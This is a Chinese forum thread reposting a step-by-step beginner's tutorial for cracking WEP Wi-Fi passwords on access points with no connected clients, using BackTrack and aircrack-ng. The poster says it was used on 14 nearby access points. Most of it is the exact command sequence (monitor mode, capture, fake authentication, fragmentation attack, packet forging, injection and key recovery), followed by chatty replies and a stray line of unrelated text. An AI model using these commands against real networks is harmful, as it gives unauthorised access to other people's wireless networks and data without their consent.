瑞特
更多更多更多 回复一下吗,好吧回复 1# liyg 的帖子
瞧一瞧,看一看回复 1# liyg 的帖子
瞧一瞧,看一看 ddd 一直都在支持你啦 菜鸟福音!!! [原创]参赛贴 BT2、BT3下破解无客户端wep 上图前面发了[原创]参赛 菜鸟BT2破解无客户端wep简明教程
转自中国无线门户,原文地址:http://forum.anywlan.com/dispbbs.asp?boardID=15&ID=7444&page=1
兄弟们强烈要求上图,苦于菜鸟,不懂得如何在bt环境下截图,本版管理员老大及时发了bt下截图贴,现场学会。正好下载并刻录了bt3,就在bt3里用同样的方式破解,并截图成功(感谢本版管理员,又学了一招)。
并将原帖整理,重新贴出来,所有的命令和过程全全程截图,希望对各位像我这样的菜鸟有所帮助——
俺是正宗菜鸟,不懂linux,甚至看不到e文,但在本论坛泡了两个星期,成功用BT2(u盘启动)破解我家周围14个wep加密的AP,尤其是,用BT2破解了4长期无客户端的AP.可见,本论坛是何等的实用。在此,特别感谢haohamaru大侠和longas大侠,更感谢本论坛提供了一个绝好的学习实践平台。
装备: dell D410笔记本、linksys wusb54g v4 (加装12db 八木定向天线)、bt2 usb 系统
1.先升级Aircrack。因破解环境往往无法在线升级bt2,故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘,我是放在c盘的根目录下。
用usb bt2 系统启动bt2,进入界面后,打开一个窗口,
输入cd /mnt
输入再输入 ls
这样你就能看到你的硬盘名 一般是sda1 hda1 或hdc1(我的就是hda1)
再输入
cd /mnt/hda1 或者cd /mnt/hdc1, 就是进入你的c盘根目录。
再输入
tar -xf aircrack-ng-0.9.1.tar.gz
再输入
cd aircrack-ng-0.9.1
再输入
make clean && make && make install
这样,你就可以直接在新版本下破解了。
2.输入ifconfig –a 查看网卡 (顺便记下自己网卡的mac,后面要用到)
我的网卡是rausb0
再输入ifconfig –a rausb0 up 加载usb网卡驱动
3.输入airmon-ng start rausb0 6 激活网卡的Monitor模式
后面的6 是你要破解ap 的工作频道 根据实际,换成你破解的ap的实际工作频道(下同)。
4.输入抓包命令,抓包并查看你要破解的ap的essid 和 mac
输入命令 airodump-ng --ivs -w name -c 6 rausb0 ,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac ,并记下ap的essid 和mac。
5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap
输入 aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0
这时,系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)
6.输入aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0 来获得xor文件
如果一切顺利,系统将回显 Use this packet ?
输入y 回车
再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
7.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -xxxx-xxxxxx.xor -w mrarp 其中,–l中的l是L的小写,别和1混淆,而其中的xxxx-xxxx.xor 是你刚才生成的文件名
系统回显:Wrote packet to: mrarp
8.输入aireplay-ng -2 –r mrarp -x 1024 rausb0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是512。
输入y 回车 攻击开始
这时,前面的抓包窗口上的data将迅速增加。
到数据增加到3万以上时,另开窗口,启动
aircrack-ng -n 64 -b ap的mac name-01.ivs
其中 64 是64位密码,如果是128位,换成128即可。
我个人感觉,bt2(u盘启动) 对pc卡 、pcm 卡 支持不怎么好——我一块 声宝la4111、一块神脑2511大功率无线网卡都不支持发包攻击,最终的成功来源于linksys wusb54g v4 。
使用该卡破解,两点需要注意:
一是该卡的天线和发射功率都比较次,对较弱的信号,需要对网卡天线进行改造(具体参考坛子上的改造方式,我用的是12db的八木定向天线),否则无法发包。
二是 由于该卡功率有限,在发包攻击时,最好限定发包数量,否则容易发生网卡发热,出现“死卡”现象。 具体是:
在破解有客户端时,发包命令 aireplay-ng -3 -b 路由mac -h 客户mac rausb0 在该命令中加入 -x 参数,限定发包速度。 我用的是1024 ,甚至512 。具体的命令为aireplay-ng -3 -b 路由mac -h 客户mac -x 512 rsusb0
而在破解无客户端时,发包命令 aireplay-ng -2 –r arp rausb0 中间同样插入参数 -x 1024 或 -x 512 我选择的是 aireplay-ng -2 –r arp -x 512 rausb0 。 谢谢需哟啊啊 好好好,以后我们就可以有希望了,具体的怎么样操作说说 中文速度慢点吧? 硬盘我试过不行,现在没办法了,只有试着用U盘啦 二代人复合接口氯碱化工